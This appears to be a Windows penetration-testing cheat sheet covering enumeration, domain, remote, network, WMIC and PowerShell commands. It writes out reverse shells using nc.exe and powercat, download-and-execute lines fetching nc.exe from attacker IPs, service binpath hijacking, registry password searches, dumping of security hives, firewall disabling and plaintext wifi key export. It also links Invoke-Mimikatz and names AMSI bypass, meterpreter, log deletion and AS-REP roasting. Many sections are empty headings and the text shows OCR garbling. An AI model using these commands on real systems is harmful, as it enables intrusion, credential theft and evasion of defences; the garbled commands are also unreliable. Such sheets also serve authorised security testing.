Windows
Windows
Versions
Number or ID | Versions |
---|---|
NT 3.1 | Windows NT 3.1 (All) |
NT 3.5 | Windows NT 3.5 (All) |
NT 3.51 | Windows NT 3.51 (All) |
NT 4.0 | Windows NT 4.0 (All) |
NT 5.0 | Windows 2000 (All) |
NT 5.1 | Windows XP (Home, Pro, MC, Tablet PC, Starter, Embedded) |
NT 5.2 | Windows XP (64-bit, Pro 64-bit) Windows Server 2003 & R2 (Standard, Enterprise) Windows Home Server |
NT 6.0 | Windows Vista (Starter, Home, Basic, Home Premium, Business, Enterprise, Ultimate) |
NT 6.1 | Windows 7 (Starter, Home, Pro, Enterprise, Ultimate) Windows Server 2008 R2 (Foundation, Standard, Enterprise) |
NT 6.2 | Windows 8 (x86/64, Pro, Enterprise, Windows RT (ARM)) Windows Phone 8 Windows Server 2012 (Foundation, Essentials, Standard) |
Files
Command | Explanation |
%SYSTEMROOT% | Usually C:\Windows |
%SYSTEMROOT%\System32\drivers\etc\hosts | DNS Entities |
%SYSTEMROOT%\System32\drivers\etc\networks | Network settings |
%SYSTEMROOT% system32 config\SAM | Username and password hash |
%SYSTEMROOT%\repair\SAM | Copy of SAM |
%SYSTEMROOT%\System32\config\RegBack\SAM | Backup copy of SAM |
%WINDIR%\system32\config\AppEvent.Evt | Program reports |
%WINDIR%\system32\config\SecEvent.Evt | Security reports |
%ALLUSERSPROFILE%\Start Menu\Programs\Startup\ | Startup path |
%USERPROFILE%\Start Menu\Programs\Startup\ | Startup path |
%SYSTEMROOT%\Prefetch | Path Prefetch (EXE reports) |
Launcher paths
For WINDOWS NT 6.1,6.0
For WINDOWS NT 5.2, 5.1, 5.0
FOR WINDOWS 9x
for WINDOWS NT 4.0, 3.51, 3.50
System information commands
Command | Explanation |
version | Operating system version |
sc query state=all | Show services |
tasklist /svc | Show process and services |
tasklist /m | Show all processes and dlls |
tasklist /S ip /v | Remotely running processes |
taskkill /PID pid /F | Forced removal of the process |
systeminfo /S ip /U domain\user /P Pwd | Receive system information remotely |
reg query \ ip \ RegDomain \ Key /v VALUE | Send a query to the registry, /s=all values |
reg query HKLM /f password /t REG_SZ /s | Registry search for passwords |
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate | WSUS address |
fsutil fsinfo drives | List of drivers • need admin access |
dir /a /s /b c:'.pdf’ | Search for all pdf files |
dir /a /b c:\windows\kb’ | Search for patches |
findstr /si password’ .txt I •.xmll •.xls | Search files for passwords |
tree /F /A c: tree.txt | List of folders on drive C: |
reg save HKLM\Security security.hive | Save security hives inside the file |
echo %USERNAME% | Current user |
whoami /priv | Current user permissions |
command net/domain
Command | Description |
---|---|
net view /domain | Current domain host |
net view /domain: [MYDOMAIN] | hosts in [MYDOMAIN] |
net user /domain | All users of the current domain |
net user user pass /add | Add user |
net localgroup "Administrators" user /add | Add user to Administrators |
net accounts /domain | Domain password policies |
net localgroup "Administrators" | List of Local Admins |
net group /domain | List of domain groups |
net group "Domain Admins" /domain | List of Admin users in the domain |
net group "Domain Controllers" /domain | List of DCs for the current domain |
net share | SMB share |
net session I find I "\" | List of active SMB sessions |
net user user /ACTIVE:yes /domain | Open domain domain |
net user user '' newpassword '' /domain | Change domain username and password |
net share share c:\share /GRANT:Everyone,FULL | Shared folder |
Remote commands
Command | Description |
---|---|
tasklist /S ip /v | Processes running on ip |
systeminfo /S ip /U domain\user /P Pwd | IP information |
net share \\ ip | ip environment |
net use \\ ip | ip system file |
net use z: \\ ip \share password /user: DOMAIN user | Map drive, specified credentials |
reg add \\ ip \ regkey \ value | Added registry key for ip |
sc \\ ip create service binpath=C:\Windows\System32\x.exe start=auto | Create a remote service (space after start=) |
cmd.exe /c certutil -urlcache -split -f http://ip/nc.exe c:/windows/temp/nc.exe | Copy file from ip to current system by cmd.exe |
cmd.exe /c c:/windows/temp/nc.exe ip port -e cmd.exe | Shell reverse |
nc.exe -lvvp port | Listening on specific port |
python3 -m http.server port | Create webserver |
xcopy /s \\ ip \dir C:\local | Copy of ip fodder |
shutdown /m \\ ip /r /t 0 /f | restart system with ip |
Network commands
Command | Description |
---|---|
ipconfig I all | ip settings |
ipconfig /displaydns | DNS cache |
netstat -ana | Show connection |
netstat -anop tcp 1 | Create Netstat loop |
netstat -ani findstr LISTENING | Ports in use |
route print | Route tables |
arp -a | Get system MACs (using ARP table) |
nslookup, set type=any, ls -d domain results.txt, exit | Get DNS Zone Xfer |
nslookup -type=SRV _www._tcp.url.com | Get Domain SRV lookup (ldap, kerberos, sip) |
tftp -I ip GET remotefile | File Transfer in TFTP |
netsh wlan show profiles | Profiles stored on the wireless network |
netsh firewall set opmode disable | Firewall deactivation ('Old) |
netsh wlan export profile folder=. key=clear | wifi extraction in plaintext |
netsh interface ip show interfaces | List of IDs/MTUs related to interfaces |
netsh interface ip set address local static ip nmask gw ID | Set IP |
netsh interface ip set dns local static ip | DNS server configuration |
netsh interface ip set address local dhcp | Set interface to use DHCP |
Functional commands
Command | Description |
---|---|
type file | Show file contents |
del path \' .• /a /s /q /f | Delete files in current path |
find /I ''str'' filename command I find /c /v "" | List of cmd outputs |
at HH:MM file [args] (i.e. at 14:45 cmd /c) | File execution schedule |
runas /user: user " file [args]" | Execute file with specific user |
restart /r /t 0 | Restart |
sc stop UsoSvc | Stop the UsoSvc service |
sc start UsoSvc | Starting the UsoSvc service |
sc config UsoSvc binpath="c:\windows\temp\nc.exe ip port -e C:\windows\system32\cmd.exe" | Change path of executable file by UsoSvc |
tr -d '\15\32' win.txt unix.txt | Delete CR & 'Z ('nix) |
makecab file | Compression |
Wusa.exe /uninstall /kb: ### | Delete patch |
cmd.exe "wevtutil qe Application /c:40 /f:text /rd:true" | Using the Event Viewer in the CLI |
lusrrngr.msc | Using Local user manager |
services.msc | Using Services control panel |
taskmgr.exe | Using Task manager |
secpool.rnsc | Using Security policy manager |
eventvwr.rnsc | Using Event viewer |
MISC. commands
Locking the workstation
Disable Windows Firewall
Create port forward (*need admin access)
enable cmd
PSEXEC command
Remote file execution with specific identity information
Execution of command with special hash
Run the command on the remote system
Terminal service (RDP)
Start RDP
RDP tunnel from port 443 (need to restart the terminal service)
Remove network authentication by adding an exception in the firewall
Import task from XML file
WMIC command
Command | Description |
---|---|
wmic [alias] get /? | List of all features |
wmic [alias] call /? | Callable method |
wmic process list full | process properties |
wmic startupwmic service | start wmic service |
wmic ntdomain list | Domain and DC information |
wmic qfe | List of all patches |
wrnic process call create "process_name" | Run process |
wmic process where name="process" call terminate | Delete process |
wmic logicaldisk get description,name | Display logical sharing environment |
wmic cpu get DataWidth /format:list | Show 32-bit or 64-bit version of the system |
wmic service where started = true get name, startname | Show running services |
WMIC [alias] [where] [clause]
Run the file in smb with specific identity information
Remove the software
Remote user access
Show processes in real time
Start RDP
The list of times that the user has entered
Search services for unquoted routes
Copy of Volume shadow
POWERSHELL environment
Command | Description |
stop-transcript | Stop recording |
get-content file | Display the contents of the file |
get-help command-examples | Display sample command |
get-command ‘string’ | Search for cmd |
get-service | Show services (stopservice, start-service) |
get-wmiobject -class win32 service | Show services with the same identity information |
$PSVersionTable | Show powershell version |
powershell.exe -version 2.0 | Run powershell 2.0 from version 3.0 |
get-service measure-object | Information returned from the service |
get-psdrive | List returned from PSDrives |
get-process select -expandproperty name | show names |
get-help ‘-parameter credential | Receive identity information |
get-wmiobject -list -‘network’ | WMI available on the network |
(Net.DNS]: :GetnostEntry(” ip “I | Process DNS Lookup |
powershell.exe wget “http://10.10.10.10/nc.exe” -outfile “c:\temp\nc.exe” | Download and save the file |
poweshell.exe -c “IEX (New-Object System.Net.WebClient).DownloadString(‘http://10.10.10.10:8000/powercat.ps1’); powercat -c 10.10.10.100 -p 4444 -e cmd | reverse loose |
https://gist.githubusercontent.com/zhilich/b8480f1d22f9b15d4fdde07ddc6fa4ed/raw/8078a51bbfa18df36d8e890fefe96a06891dd47d/SimpleHttpServer.ps1 | Web server with port 8050 |
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | Use mimikatz |
call ps1 files | Import-Module .\Invoke-Mimikatz.ps1 |
Download and save the file iwr -uri http://10.10.10.10/file -o file.exe |
|
Bypass AMSI
Or
Disable realtimemonitoring
List of all users
List of all domains
Get AD credentials using donotrequirepreauth
Deleting security reports and programs (for SVR01)
Extract the version of the operating system inside the CSV file
List of running services
Using ps drive for permanent sharing
Files written on 8/20
Get file from http
tcp port connections (scanner)
Ping command with 500 millisecond timeout
Basic authentication window
Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, device 0800-1700
Run Powershell as
Upload with powershell
Email sender
Activating remote access to powershell (requires identity information)
hostname and ip list for all domains
Download from Powershell from specific path
Display Powershell data
Using powershell to run meterpreter from memory
in the attacking system
Start the listener in the attacking system
On the target system (run powershell(x86))
Encodemeterpreter.ps1 [7]
Copyright 2012 TrustedSec, LLC. All rights reserved. Please see reference [7] for disclaimer
Using powershell to start meterpreter (second method)
On bt attack box
in the attacking system
Start the listener in the attacking system
In the target system (1: download the shell code, 2: execute)
Identification of vulnerable domains with powerup
Windows registry
operating system information
Product Name
Installation Date
registered name
System boot information
Time zone information (in minutes from UTC)
Map of network drivers
Mounted devices
usb devices
Activation of IP forwarding
Password keys: LSA secret cat certain vpn, autologon, other passwords
Audit policy information
Kernel and user services
software installed in the system
Installed software for the user
Latest documents
The last positions of the user
URLs typed
MRU lists
The last registry key used
Launch paths
Activation of Remote Desktop
Get Windows information with dsquery
List of domain users
List of domain groups domain=victim.com
List of domain administrators
List of user groups
Get the entered user id
List of users who have not been active in the last two weeks
Add user
Delete user
List of domain operating systems
List of site names
List of all subnets in the site
List of services in the site
Get domain servers
DC list of the site
Script writing
Bash script variables must be placed in the form %% For example %%i
Create ping sweep
Create a loop inside the file
domain brute forcer operation
account closing(lockout.bat)
DHCP exhaustion operation
DNS reverse lookup process
Search all the paths to find the files that contain PASS and display the details of that file
Malicious domain simulation (Application for IDS test)
Operation of IE web looper (traffic generator)
Get access to executive services
Spinning Reboot (replace /R with /S to shutdown):
Create a shell using vbs (requires identity information)
Scheduling the task
Scheduling the task (ST=start time, SD=start date, ED=end date) *need admin access
Always schedule task [10]
Instructions for working with smb
Log in with a specific user
Login without password
Change password
Show shared route
Show the specified route
Login to Shell
Get users along with password hash
Guess different smb passwords
with metasploit
with medusa
rpcclient commands
entering the system
Show user information
Show users
Show permissions
Change user access
Show printers
NTLM extraction from ntds.dit file
Gather information using SharpHound
Gather information about Sql Server
Obtain AS-REP Roast hash
List of available ips without using nmap
Or
Service identification with Test-WSMan
Enumerate OU’s
Retrieve users in ‘ICS’ OU
SharpHound Collect
Impersonate Token of nuclear\vdadmin (on psexec session)
Last updated